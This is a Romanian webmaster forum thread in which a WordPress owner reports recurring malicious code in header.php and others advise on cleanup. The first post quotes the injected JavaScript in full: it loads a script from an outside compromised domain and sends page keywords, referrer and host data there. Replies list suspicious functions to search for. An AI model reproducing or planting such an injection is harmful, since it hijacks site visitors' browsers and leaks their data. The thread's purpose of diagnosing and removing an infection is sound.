Pagina 1 din 3 123 UltimulUltimul
Rezultate 1 la 10 din 29

Subiect: Help! Cod suspect in header.php wp

  1. #1
    Avatarul lui ovidiu_negoescu
    ovidiu_negoescu este deconectat Junior SeoPedia
    Reputatie:
    0
    Data înscrierii
    6th October 2013
    Locaţie
    targoviste
    Posturi
    72
    Putere Rep
    0


    Implicit Help! Cod suspect in header.php wp

    Salutare.

    De cateva zile tot gasesc headerul modificat. Il sterg si reapare.

    "<script>var a='';setTimeout(10);if(document.referrer.indexOf(l ocation.protocol+"//"+location.host)!==0||document.referrer!==undefine d||document.referrer!==''||document.referrer!==nul l){document.write('<script type="text/javascript" src="http://www.sportingcastelguelfo.it/js/jquery.min.php?c_utt=K85164&c_utm='+encodeURICompo nent('http://www.sportingcastelguelfo.it/js/jquery.min.php'+'?'+'default_keyword='+encodeURICo mponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(met as){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window. location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.r eferrer)+'&source='+encodeURIComponent(window.loca tion.host))+'"><'+'/script>');}</script>"

    Stie cineva care este problema?

    Apare pe toate siteurile de pe server, cele care au wp instalat.
    Am toate updateurile la zi.

    Multumesc.

  2. #2
    Avatarul lui Robert
    Robert este deconectat Ambasador
    Reputatie:
    98
    Data înscrierii
    7th August 2007
    Locaţie
    Bucuresti
    Vârstă
    48
    Posturi
    4.029
    Putere Rep
    98


    Implicit

    Salve.
    Pasul 1: schimba toate parolele de pe o alta unitate.
    Pasul 2: scaneaza-ti unitatea de virusi, posibil de acolo sa fie problema.
    Pasul 3: reinstaleaza un wordpress curat. Pune si un bulletproof, ca nu strica. Verifica folderul de uploads, pentru ca multi acolo insereaza fisierele malitioase, acest folder nefiind sters la un fresh install de wp.

    Daca tot reapare, posibil sa ai o problema la thema. (desi este putin probabil daca spui ca toate siteurile de pe server au beleaua asta.
    Daca te pot ajuta cu un sfat sau daca doresti o oferta de optimizare pentru siteul tau, da-mi un mesaj!

  3. #3
    Avatarul lui Dan
    Dan
    Dan este deconectat Membru SeoPedia
    Reputatie:
    111
    Data înscrierii
    17th November 2004
    Locaţie
    Cluj
    Posturi
    3.358
    Putere Rep
    111


    Implicit

    Din pacate te-ai virusat. (parerea mea).
    Nu este asa de grav, doar ca trebuie atentie la "devirusare". Si ia ceva timp.
    downloadeaza backupurile, bazele de date, inclusiv versiunea live.

    Apoi spune-ne ce fel de server este, daca e cont shared, vps/dedicat si cu siguranta se va gasi cineva sa te indrume mai departe.
    Ultima modificare făcută de Dan; 6th May 2016 la 14:17.

  4. #4
    Avatarul lui harrvester
    harrvester este deconectat Membru SeoPedia
    Reputatie:
    19
    Data înscrierii
    21st February 2016
    Locaţie
    Bucuresti
    Vârstă
    36
    Posturi
    58
    Putere Rep
    19


    1 out of 1 members found this post helpful.

    Implicit

    E destul de grava problema.

    Daca esti pe host shared, iti recomand sa treci pe ceva dedicat. Cu siguranta hacker-ul are acces la server. Nu cred ca vei scapa de problema, mai ales daca problema e de la un alt site.

    Ce se intampla, pe scurt. Hacker-ul a gasit un exploit la unul dintre site-uri. Cel mai probabil a putut incarca un fisier php. Cel mai probabil, php-ul poate rula functia exec (PHP: exec - Manual), sau ceva similar. De aici hacker-ul capata acces la server. Toate fisierele. Daca ai indemanare se poate si fara exec

    Urmatoarele sale prioritati vor fi:

    1. sa ascunda cod php in mai multe fisiere pt. a avea acces in continuare chiar daca se rezolva bug-ul initial.
    2. sa injecteze cod js in diferite fisiere pt: like pe facebook la diferite pagini / trafic pe alte pagini (iframe ascuns) etc. In general monetizare.

    Vestile cele mai proaste:
    1. Infectarea fisierelor se face automat (hackerul nu editeaza de mana fiecare fisier)
    2. Infectarea fiserelor se face dupa un anumit pattern: scaneaza directoare, vede daca ai wp instalat, modifica fisierele cheie; totul se poate face din php;
    3. Daca accesezi un fiser php /js deja infectat, sunt multe sanse sa intample pasii 1 si 2 de mai sus.

    Cum rezolvi problema:

    1. pleci de pe server;
    2. install wp curat / pluginuri; NU pastrezi fisere vechi! (decat daca stii ce faci)
    3. update la zi pt. tema / pluginuri;
    4. poti incerca sa instalezi iThemes Security si / sau wordfence, dar NU te baza pe serviciul lor de devirusare. (cel free, nu am folosit serviciile platite.)
    5. poti urmari cateva tutoriale de aici https://www.wordfence.com/learn/ pentru a intelege mai bine de ce si cum se intampla totul.

    ** update: Incearca sa vb cu firma de hosting; daca e o problema pe tot serverul s-ar putea sa te ajute.

  5. #5
    Avatarul lui ovidiu_negoescu
    ovidiu_negoescu este deconectat Junior SeoPedia
    Reputatie:
    0
    Data înscrierii
    6th October 2013
    Locaţie
    targoviste
    Posturi
    72
    Putere Rep
    0


    Implicit

    Multumesc pentru lamuriri si sfaturi. Sper sa rezolv problema cu ceea ce mi-ati recomandat.

  6. #6
    Avatarul lui Nic
    Nic
    Nic este deconectat Super Moderator
    Reputatie:
    53
    Data înscrierii
    14th May 2007
    Posturi
    987
    Putere Rep
    53


    Implicit

    Da, esti hackuit/virusat.

    Poti citi aici mai mult:

    https://blog.sucuri.net/2015/11/jque...-websites.html

    Nu e indeajuns sa stergi codul, trebuie stearsa si portita pe care a intrat hackerul, altfel o sa te "re-hackuiasca" constant la cateva zile.

  7. #7
    Avatarul lui Mishu
    Mishu este deconectat Membru SeoPedia
    Reputatie:
    32
    Data înscrierii
    28th March 2013
    Vârstă
    57
    Posturi
    1.307
    Putere Rep
    32


    Implicit

    Cel mai probabil nu gasesti nimic dar e bine sa arunci o privire:
    Deschide fisierul functions.php al temei active si verifica-l prin comparatie cu originalul. Daca alte fisiere sunt mentionate, verifica-le si pe alea.
    Cauti in principiu formulari de forma:
    Cod:
    require_once('cale/fisier.ext');
    Extensia nu e neaparat sa fie php.
    Ce mi se pare ciudat este faptul ca acel cod apare scris chiar in header.php. E ca si cum cel care a facut codul nu cunostea suficient de bine Wordpress...
    Gandeste-te si la posibilitatea de a schimba permisiunile pentru header.php (il pui read only) si apoi sa cauti in log daca apare vreo eroare referitoare la asta si ce anume a generat-o.

  8. #8
    Avatarul lui rcostica
    rcostica este deconectat Membru SeoPedia
    Reputatie:
    20
    Data înscrierii
    8th July 2015
    Locaţie
    Bucuresti
    Vârstă
    44
    Posturi
    68
    Putere Rep
    20


    Implicit

    Iti sugerez sa incerci plugin-ul GOTMLS. Eu l-am folosit cu succes in trecut pentru un hack de care nu reuseam sa scap, iar autorul lui spune ca poate sa elimine infectia: https://wordpress.org/support/topic/...being-injected

  9. #9
    Avatarul lui harrvester
    harrvester este deconectat Membru SeoPedia
    Reputatie:
    19
    Data înscrierii
    21st February 2016
    Locaţie
    Bucuresti
    Vârstă
    36
    Posturi
    58
    Putere Rep
    19


    1 out of 1 members found this post helpful.

    Implicit

    Citat Postat în original de rcostica Vezi Post
    Iti sugerez sa incerci plugin-ul GOTMLS. Eu l-am folosit cu succes in trecut pentru un hack de care nu reuseam sa scap, iar autorul lui spune ca poate sa elimine infectia: https://wordpress.org/support/topic/...being-injected
    Nu conteaza daca poate sa elimine infectia. E posibil sa ai mai multe probleme (diferite) in mai multe fisiere. Clean install. Neaparat!
    Si sincer, degeaba elimina problema. Trebuie sa elimine sursa problemei.

    Citat Postat în original de rcostica Vezi Post
    Gandeste-te si la posibilitatea de a schimba permisiunile pentru header.php (il pui read only)
    E inutil. Daca poate edita fisierul ii poate schimba si permisiunile. Defapt, unele tool-urile folosite de hackeri fac asta by default, inainte de a modifica fisierele.

    Citat Postat în original de Mishu Vezi Post
    Ce mi se pare ciudat este faptul ca acel cod apare scris chiar in header.php. E ca si cum cel care a facut codul nu cunostea suficient de bine Wordpress...
    Il cunoaste suficient. Vrea ca scriptul sa fie accesat de fiecare data cand cineva intra pe site. Daca e in header.php, e in fiecare pagina a site-ului.

    Daca vrei sa te uiti prin fisiere cauta

    in js:
    -> exec('cod');
    -> atob('cod in base 64'); sau btoa
    -> orice cod in base 64 sau encodat sub alta forma;
    -> iframe sau referinta la sursa externa
    -> search dupa "http://" sau ".com / .ru / "

    in php:
    -> exec / passthru / system; in general tot ce e aici: PHP: Program execution Funcții - Manual
    -> file_get_contents(sursa externa)
    -> base64_encode sau
    -> orice cod in base 64 sau encodat sub alta forma;

    Mai jos un filmulet in care se explica tot procesul de infectare. Va recomand sa urmariti.

  10. #10
    Avatarul lui Mishu
    Mishu este deconectat Membru SeoPedia
    Reputatie:
    32
    Data înscrierii
    28th March 2013
    Vârstă
    57
    Posturi
    1.307
    Putere Rep
    32


    Implicit

    Citat Postat în original de harrvester Vezi Post
    ..........Il cunoaste suficient. Vrea ca scriptul sa fie accesat de fiecare data cand cineva intra pe site. Daca e in header.php, e in fiecare pagina a site-ului.
    .........
    M-am referit la faptul ca putea sa-si afiseze codul in header fara a modifica fisierul header.php. Asta e oarecum metoda mai putin discreta...

Pagina 1 din 3 123 UltimulUltimul

Informații subiect

Utilizatori care navighează în acest subiect

Momentan este/sunt 1 utilizator(i) care navighează în acest subiect. (0 membrii și 1 vizitatori)

Thread-uri Similare

  1. Trafic suspect din Adwords
    De ZimZum în forumul Subiecte pentru incepatori
    Răspunsuri: 5
    Ultimul Post: 12th February 2015, 10:04
  2. Link suspect la pingback
    De MarianG în forumul Bar, lobby...
    Răspunsuri: 0
    Ultimul Post: 21st June 2014, 16:43
  3. director web suspect?
    De Cipiot în forumul Directoare romanesti
    Răspunsuri: 6
    Ultimul Post: 18th February 2012, 14:22
  4. trafic suspect
    De FireEyes în forumul Metode de promovare, Analiza trafic.
    Răspunsuri: 8
    Ultimul Post: 29th May 2006, 23:07
  5. Cel Putin Suspect !!!
    De tataraseni în forumul Metode de promovare, Analiza trafic.
    Răspunsuri: 24
    Ultimul Post: 26th April 2006, 14:33

Etichete pentru acest subiect

Permisiuni postare

  • Nu puteţi posta subiecte noi.
  • Nu puteţi răspunde la subiecte
  • Nu puteţi adăuga ataşamente
  • Nu puteţi modifica posturile proprii
  •